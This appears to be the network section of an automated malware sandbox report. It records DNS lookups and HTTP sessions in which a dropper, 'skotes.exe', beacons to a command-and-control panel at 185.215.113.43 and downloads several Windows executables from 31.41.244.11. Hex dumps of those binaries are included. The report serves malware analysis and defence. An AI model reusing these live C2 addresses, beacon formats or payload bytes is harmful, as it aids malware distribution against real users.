                                                                                                                                                                  Dec 18, 2024 11:09:17.031543016 CET192.168.2.61.1.1.10x59caStandard query (0)sweepyribs.latA (IP address)IN (0x0001)false
                                                                                                                                                                  Dec 18, 2024 11:09:17.256336927 CET192.168.2.61.1.1.10xa0d2Standard query (0)grannyejh.latA (IP address)IN (0x0001)false
                                                                                                                                                                  Dec 18, 2024 11:09:23.382252932 CET192.168.2.61.1.1.10x49e4Standard query (0)pancakedipyps.clickA (IP address)IN (0x0001)false

                                                                                                                                                                  DNS Answers

                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                  Dec 18, 2024 11:09:17.251812935 CET1.1.1.1192.168.2.60x59caName error (3)sweepyribs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                  Dec 18, 2024 11:09:17.575562954 CET1.1.1.1192.168.2.60xa0d2No error (0)grannyejh.lat172.67.179.109A (IP address)IN (0x0001)false
                                                                                                                                                                  Dec 18, 2024 11:09:17.575562954 CET1.1.1.1192.168.2.60xa0d2No error (0)grannyejh.lat104.21.64.80A (IP address)IN (0x0001)false
                                                                                                                                                                  Dec 18, 2024 11:09:23.697999001 CET1.1.1.1192.168.2.60x49e4No error (0)pancakedipyps.click104.21.23.76A (IP address)IN (0x0001)false
                                                                                                                                                                  Dec 18, 2024 11:09:23.697999001 CET1.1.1.1192.168.2.60x49e4No error (0)pancakedipyps.click172.67.209.202A (IP address)IN (0x0001)false

                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                  • grannyejh.lat
                                                                                                                                                                  • pancakedipyps.click
                                                                                                                                                                  • 185.215.113.43
                                                                                                                                                                  • 31.41.244.11

                                                                                                                                                                  HTTP Packets

                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  0192.168.2.649862185.215.113.43801088C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Dec 18, 2024 11:09:05.676002979 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                  Host: 185.215.113.43
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Data Raw: 73 74 3d 73
                                                                                                                                                                  Data Ascii: st=s
                                                                                                                                                                  Dec 18, 2024 11:09:07.023674011 CET219INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                  Date: Wed, 18 Dec 2024 10:09:06 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Refresh: 0; url = Login.php
                                                                                                                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 1 0


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  1192.168.2.649871185.215.113.43801088C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Dec 18, 2024 11:09:08.652892113 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                  Host: 185.215.113.43
                                                                                                                                                                  Content-Length: 160
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 33 32 41 37 34 42 36 35 44 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB32A74B65D82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                  Dec 18, 2024 11:09:09.993032932 CET492INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                  Date: Wed, 18 Dec 2024 10:09:09 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Data Raw: 31 32 64 0d 0a 20 3c 63 3e 31 30 31 36 38 36 38 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 66 37 30 39 36 34 65 30 33 61 63 35 32 65 61 34 38 34 62 34 31 31 62 39 64 63 34 65 31 23 31 30 31 36 38 36 39 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 64 37 65 38 36 34 34 30 33 61 63 35 32 65 61 34 38 34 62 34 31 31 62 39 64 63 34 65 31 23 31 30 31 36 38 37 30 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 39 36 61 38 30 35 31 34 35 62 30 30 32 61 62 35 65 34 35 34 32 35 31 39 37 64 31 61 61 31 64 61 61 61 38 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 12d <c>1016868001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcf70964e03ac52ea484b411b9dc4e1#1016869001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcd7e864403ac52ea484b411b9dc4e1#1016870001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc96a805145b002ab5e45425197d1aa1daaa8#<d>0


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  2192.168.2.64987731.41.244.11801088C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Dec 18, 2024 11:09:10.118413925 CET59OUTGET /files/dodo/random.exe HTTP/1.1
                                                                                                                                                                  Host: 31.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.447705984 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                  Date: Wed, 18 Dec 2024 10:09:11 GMT
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  Content-Length: 765568
                                                                                                                                                                  Last-Modified: Tue, 17 Dec 2024 09:46:16 GMT
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  ETag: "67614868-bae80"
                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                  Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 09 00 a3 1e 60 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 aa 01 00 00 c0 00 00 00 00 00 00 52 59 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 0b 00 00 08 00 00 00 00 00 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 37 02 00 3c 00 00 00 00 a0 02 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 80 2e 00 00 00 b0 02 00 40 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fe 01 00 18 00 00 00 e8 cd 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 28 39 [TRUNCATED]
                                                                                                                                                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL`g"RY@@7<.@X(9T.text `.rdata$@@.datal"P>@.bsSST `.tlsV@.rsrcX@@.reloc@Z@B.bsst@.bss`@
                                                                                                                                                                  Dec 18, 2024 11:09:11.447808027 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                  Data Ascii:
                                                                                                                                                                  Dec 18, 2024 11:09:11.447819948 CET1236INData Raw: ec 30 8b 5c 24 44 a1 c0 57 42 00 31 e0 89 44 24 2c 8b 43 3c 8b 6c 18 78 8b 44 1d 18 85 c0 0f 84 4f 01 00 00 8b 4c 1d 20 01 d9 89 4c 24 08 48 89 44 24 10 c7 04 24 00 00 00 00 89 5c 24 04 89 6c 24 0c 8b 44 24 08 8b 30 01 de 0f 57 c0 f2 0f 11 44 24
                                                                                                                                                                  Data Ascii: 0\$DWB1D$,C<lxDOL L$HD$$\$l$D$0WD$$WD$V(w"|$$D$(WVt$VfSCErPPD$|$$l$(WVPe\$Dl$t$h5Vm
                                                                                                                                                                  Dec 18, 2024 11:09:11.447937012 CET1236INData Raw: f0 68 6d 64 85 93 ff 35 6c 64 42 00 e8 16 fb ff ff 83 c4 08 89 45 e4 8b 55 e4 ff d2 bb 49 05 00 00 be 11 50 42 00 6a 11 68 00 50 42 00 53 56 e8 96 fc ff ff 83 c4 10 6a 0a 68 00 c0 41 00 57 8b 7d 08 57 e8 82 fc ff ff 83 c4 10 68 01 dc af 8a ff 35
                                                                                                                                                                  Data Ascii: hmd5ldBEUIPBjhPBSVjhAW}Wh5ldBMQj@SVuM11^_[]}uVPB'jT9BUSWV,\$@WB1D$(d=0w@ldBhb-/5ldBE(AD$
                                                                                                                                                                  Dec 18, 2024 11:09:11.447946072 CET896INData Raw: 42 00 31 e0 89 44 24 08 8b 01 8b 40 04 8b 7c 01 38 85 ff 74 48 89 e3 89 d9 56 e8 1a ff ff ff 80 7b 04 00 74 31 8b 07 89 f9 ff 50 34 83 f8 ff 0f 94 c0 8b 0e 8b 51 04 8d 0c 16 83 7c 16 38 00 0f 94 c4 08 c4 0f b6 c4 c1 e0 02 0b 44 16 0c 6a 00 50 e8
                                                                                                                                                                  Data Ascii: B1D$@|8tHV{t1P4Q|8DjPnL$1^_[WV D$,WB1T$A#AuL$1 ^_|$0t1PP?BBDBD@Bt$RWhABV?
                                                                                                                                                                  Dec 18, 2024 11:09:11.447947025 CET1236INData Raw: c2 08 00 e8 93 fa ff ff cc 8b 44 24 04 8b 54 24 08 89 10 89 48 04 c2 08 00 8b 44 24 04 8b 10 8b 40 04 8b 49 04 33 48 04 33 54 24 08 09 ca 0f 94 c0 c2 08 00 cc 53 57 56 83 ec 0c 8b 74 24 20 8b 44 24 1c 8b 15 c0 57 42 00 31 e2 89 54 24 08 8b 11 89
                                                                                                                                                                  Data Ascii: D$T$HD$@I3H3T$SWVt$ D$WB1T$PWROVI3J3L$1^_[USWVWB1D$WD$W$t$8l$4\$0wx@Wt$<PXQ
                                                                                                                                                                  Dec 18, 2024 11:09:11.448071957 CET1236INData Raw: 01 fb 8b 74 24 20 56 ff 74 24 20 53 e8 96 54 00 00 83 c4 0c c6 04 1e 00 89 7d 00 89 e8 83 c4 08 5e 5f 5b 5d c2 08 00 89 f8 83 c8 0f 01 d1 39 c8 89 ce 0f 47 f0 89 f0 40 75 0a 31 c0 31 f6 4e e9 13 ff ff ff 3d 00 10 00 00 0f 83 fb fe ff ff 50 e8 64
                                                                                                                                                                  Data Ascii: t$ Vt$ ST}^_[]9G@u11N=PdhkV@|u.Dt%L8P4u@DjP}^WVWB1D$V&t!@L8D$Pf1HT
                                                                                                                                                                  Dec 18, 2024 11:09:11.448132038 CET448INData Raw: 57 56 8b 5c 24 14 8b 74 24 10 39 de 74 1b 89 cf 83 c7 08 0f b6 06 57 50 e8 f6 21 00 00 83 c4 08 88 06 46 39 de 75 ec 89 de 89 f0 5e 5f 5b c2 08 00 0f b6 44 24 04 83 c1 08 51 50 e8 d3 21 00 00 83 c4 08 c2 04 00 cc 56 8b 44 24 08 8b 74 24 0c 89 f1
                                                                                                                                                                  Data Ascii: WV\$t$9tWP!F9u^_[D$QP!VD$t$)QPt$tO^D$VD$t$)QPt$JO^D$Vy~vxv^FtPVD$(A1VVQP78
                                                                                                                                                                  Dec 18, 2024 11:09:11.448156118 CET1236INData Raw: 1c 00 00 b9 cc 69 42 00 e8 ef 03 00 00 68 88 b8 41 00 e8 45 01 00 00 59 c3 68 92 b8 41 00 e8 39 01 00 00 59 c3 55 8b ec eb 0d ff 75 08 e8 a9 65 00 00 59 85 c0 74 0f ff 75 08 e8 28 a0 00 00 59 85 c0 74 e6 5d c3 83 7d 08 ff 0f 84 f2 20 00 00 e9 31
                                                                                                                                                                  Data Ascii: iBhAEYhA9YUueYtu(Yt]} 1UuY]UEV AtjVYY^]U];WBu!UVWdBW09Bu>u&}>td,dBWBW0:B_
                                                                                                                                                                  Dec 18, 2024 11:09:11.448182106 CET1236INData Raw: ec 56 6a 00 6a 00 e8 93 9b 00 00 8b 75 08 85 c0 59 59 b9 53 03 42 00 0f 45 c8 51 8d 4e 24 e8 41 00 00 00 8b 45 0c 85 c0 74 0a 50 6a 00 e8 6c 9b 00 00 59 59 85 c0 b9 88 0e 42 00 0f 45 c8 51 8d 4e 2c e8 1d 00 00 00 5e 5d c3 55 8b ec 8b 45 08 83 78
                                                                                                                                                                  Data Ascii: VjjuYYSBEQN$AEtPjlYYBEQN,^]UEx$tp$j>YY]USW}9;t>;t3Y#t*?VtF>u+FVYtVWPH^_[]VV(A?~YtvKYfA^UQj cEY
                                                                                                                                                                  Dec 18, 2024 11:09:11.569111109 CET1236INData Raw: 8b 01 8b 50 fc 2b c2 83 c0 fc 83 f8 1f 77 04 89 11 5d c3 e9 7b 81 00 00 8b 41 14 8b 51 10 83 f8 0f 76 02 8b 09 52 50 50 51 e8 45 00 00 00 83 c4 10 c3 8b 41 14 8b 51 10 83 f8 0f 76 02 8b 09 50 52 50 51 e8 2b 00 00 00 83 c4 10 c3 55 8b ec 8b 45 0c
                                                                                                                                                                  Data Ascii: P+w]{AQvRPPQEAQvPRPQ+UE9EtQvPuRQ]UUv<=At3MVuAW}F;F;GVPRW_^]UQS]VWMw+u;Bv+


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  3192.168.2.649888185.215.113.43801088C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Dec 18, 2024 11:09:15.670331001 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                  Host: 185.215.113.43
                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Data Raw: 64 31 3d 31 30 31 36 38 36 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                  Data Ascii: d1=1016868001&unit=246122658369
                                                                                                                                                                  Dec 18, 2024 11:09:17.000703096 CET193INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                  Date: Wed, 18 Dec 2024 10:09:16 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 4 <c>0


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  4192.168.2.64989431.41.244.11801088C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Dec 18, 2024 11:09:17.127027988 CET59OUTGET /files/fate/random.exe HTTP/1.1
                                                                                                                                                                  Host: 31.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.448532104 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                  Date: Wed, 18 Dec 2024 10:09:18 GMT
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  Content-Length: 776832
                                                                                                                                                                  Last-Modified: Tue, 17 Dec 2024 09:45:14 GMT
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  ETag: "6761482a-bda80"
                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                  Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 09 00 a3 1e 60 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 aa 01 00 00 c0 00 00 00 00 00 00 52 59 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 0c 00 00 08 00 00 00 00 00 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 37 02 00 3c 00 00 00 00 a0 02 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 ac 0b 00 80 2e 00 00 00 b0 02 00 40 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fe 01 00 18 00 00 00 e8 cd 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 28 39 [TRUNCATED]
                                                                                                                                                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL`g"RY@@7<.@X(9T.text `.rdata$@@.datal"P>@.bsSST `.tlsV@.rsrcX@@.reloc@Z@B.bsst@.bssp@
                                                                                                                                                                  Dec 18, 2024 11:09:18.448563099 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                  Data Ascii:
                                                                                                                                                                  Dec 18, 2024 11:09:18.448575974 CET448INData Raw: ec 30 8b 5c 24 44 a1 c0 57 42 00 31 e0 89 44 24 2c 8b 43 3c 8b 6c 18 78 8b 44 1d 18 85 c0 0f 84 4f 01 00 00 8b 4c 1d 20 01 d9 89 4c 24 08 48 89 44 24 10 c7 04 24 00 00 00 00 89 5c 24 04 89 6c 24 0c 8b 44 24 08 8b 30 01 de 0f 57 c0 f2 0f 11 44 24
                                                                                                                                                                  Data Ascii: 0\$DWB1D$,C<lxDOL L$HD$$\$l$D$0WD$$WD$V(w"|$$D$(WVt$VfSCErPPD$|$$l$(WVPe\$Dl$t$h5Vm
                                                                                                                                                                  Dec 18, 2024 11:09:18.448589087 CET1236INData Raw: 00 02 00 00 31 c9 88 8c 0c 00 01 00 00 89 c8 99 f7 fe 8a 04 17 88 04 0c 41 81 f9 00 01 00 00 75 e5 31 c0 31 c9 8a 94 04 00 01 00 00 00 d1 02 0c 04 0f b6 f1 8a b4 34 00 01 00 00 88 b4 04 00 01 00 00 88 94 34 00 01 00 00 40 3d 00 01 00 00 75 d4 83
                                                                                                                                                                  Data Ascii: 1Au1144@=u$1111QQQ(9BCIuhMBheB~P:C$09G9$
                                                                                                                                                                  Dec 18, 2024 11:09:18.448647022 CET1236INData Raw: c4 0c 01 e7 83 c7 10 eb 4b 89 f9 83 c9 0f 83 f9 17 be 16 00 00 00 0f 43 f1 8d 46 01 81 f9 ff 0f 00 00 72 08 50 e8 0f 01 00 00 eb 06 50 e8 ef 11 00 00 83 c4 04 89 c3 89 44 24 10 89 7c 24 20 89 74 24 24 57 55 50 e8 c4 5f 00 00 83 c4 0c 01 df 8d 5c
                                                                                                                                                                  Data Ascii: KCFrPPD$|$ t$$WUP_\$h5SmD$$r1L$prQ) $VQTWuED$D$E$(L$I!UW49BD$$4$t$
                                                                                                                                                                  Dec 18, 2024 11:09:18.448659897 CET1236INData Raw: 51 e8 8c 44 00 00 83 c4 08 c7 06 88 c3 41 00 f2 0f 10 47 0c f2 0f 11 46 0c 89 f0 5e 5f c2 04 00 cc 56 89 ce 8b 44 24 08 c7 01 28 c1 41 00 83 c1 04 31 d2 89 56 08 89 56 04 83 c0 04 51 50 e8 4f 44 00 00 83 c4 08 c7 06 a8 c3 41 00 89 f0 5e c2 04 00
                                                                                                                                                                  Data Ascii: QDAGF^_VD$(A1VVQPODA^xdBdBd,;`VBhxdBP=xdBuh@hxdB|V|$tV^BUSWVPt$D$uJWFFj \
                                                                                                                                                                  Dec 18, 2024 11:09:18.448872089 CET1236INData Raw: e0 89 44 24 18 8b 1f 8d 74 24 3c 83 7e 10 00 74 0e 89 f1 6a 02 68 51 03 42 00 e8 92 00 00 00 8b 4f 08 8b 01 89 e5 ff 77 04 55 ff 50 08 8b 45 10 83 7d 14 10 72 03 8b 2c 24 89 f1 50 55 e8 6f 00 00 00 8b 44 24 14 83 f8 10 72 2c 8b 0c 24 8d 68 01 81
                                                                                                                                                                  Data Ascii: D$t$<~tjhQBOwUPE}r,$PUoD$r,$hrQ) sF$UQ:WCWFC7L$1K^_[]USWVL$ ]U)959;$x
                                                                                                                                                                  Dec 18, 2024 11:09:18.448884010 CET1236INData Raw: 50 e8 62 23 00 00 83 c4 04 89 33 89 f9 e8 93 00 00 00 8b 4c 24 34 31 e1 e8 fc 03 00 00 b8 02 00 00 00 83 c4 38 5e 5f 5b c3 83 ec 0c 89 e0 c7 40 08 00 00 00 00 c7 40 04 b4 02 42 00 c7 00 c8 c5 41 00 68 38 42 42 00 50 e8 c0 34 00 00 53 57 56 89 ce
                                                                                                                                                                  Data Ascii: Pb#3L$418^_[@@BAh8BBP4SWV|$1S^^^^^f^^f^ ^$^(^,^0tWV^_[h=BVQF,tPF,F$tPF$FtPF
                                                                                                                                                                  Dec 18, 2024 11:09:18.448895931 CET1236INData Raw: 00 ff 15 4c 3a 42 00 c3 55 8b ec ff 75 08 e8 0a 00 00 00 f7 d8 59 1b c0 f7 d8 48 5d c3 55 8b ec 83 3d a0 64 42 00 ff ff 75 08 75 07 e8 13 80 00 00 eb 0b 68 a0 64 42 00 e8 96 7f 00 00 59 59 33 c9 85 c0 0f 44 4d 08 8b c1 5d c3 6a 08 68 48 42 42 00
                                                                                                                                                                  Data Ascii: L:BUuYH]U=dBuuhdBYY3DM]jhHBB&eMZf9@u]<@@PEuLf9@u>E@+PQ}YYt'x$|!EE38eE2MdY_^[VS$t ddB
                                                                                                                                                                  Dec 18, 2024 11:09:18.448914051 CET1236INData Raw: 15 10 37 42 00 8b 4d fc ff d6 85 ff 75 c3 5e ff 33 e8 b7 95 00 00 59 8d 4d f8 e8 96 fd ff ff 5f 5b c9 c3 55 8b ec 51 8a 45 08 33 d2 56 8b f1 68 88 0e 42 00 89 75 fc 8d 4e 18 c7 46 04 01 00 00 00 c7 06 28 c6 41 00 89 56 08 89 56 0c 89 56 10 88 46
                                                                                                                                                                  Data Ascii: 7BMu^3YM_[UQE3VhBuNF(AVVVFQ^UVEtj VYY^]Wyt+Vp7Btj17B^_jA"3MV=eBuuBVWaYYhB
                                                                                                                                                                  Dec 18, 2024 11:09:18.568406105 CET1236INData Raw: 01 e8 b0 12 00 00 5f 5b c9 c2 04 00 55 8b ec 8b 4d 08 83 c9 0f 56 3b 4d 10 77 1c 8b 75 0c 8b d6 8b 45 10 d1 ea 2b c2 3b f0 77 0c 8d 04 32 3b c8 0f 42 c8 8b c1 eb 03 8b 45 10 5e 5d c3 56 8b f1 83 7e 14 0f 76 13 e8 93 fe ff ff 8b 46 14 40 50 ff 36
                                                                                                                                                                  Data Ascii: _[UMV;MwuE+;w2;BE^]V~vF@P6YYfF^ItAuASBVWp7B_^3@3lAAAAAAAA A$A(A,A0jA3FSS^0^^F


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  5192.168.2.649907185.215.113.43801088C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Dec 18, 2024 11:09:22.312747002 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                  Host: 185.215.113.43
                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Data Raw: 64 31 3d 31 30 31 36 38 36 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                  Data Ascii: d1=1016869001&unit=246122658369
                                                                                                                                                                  Dec 18, 2024 11:09:23.641473055 CET193INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                  Date: Wed, 18 Dec 2024 10:09:23 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 4 <c>0


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  6192.168.2.64991231.41.244.11801088C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Dec 18, 2024 11:09:23.764837980 CET62OUTGET /files/burpin1/random.exe HTTP/1.1
                                                                                                                                                                  Host: 31.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.083770037 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                  Date: Wed, 18 Dec 2024 10:09:24 GMT
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  Content-Length: 4438776
                                                                                                                                                                  Last-Modified: Tue, 10 Dec 2024 00:01:52 GMT
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  ETag: "675784f0-43baf8"
                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                  Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 e7 a4 44 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 10 4f 00 00 00 00 00 00 00 00 00 00 10 7b 43 00 e8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
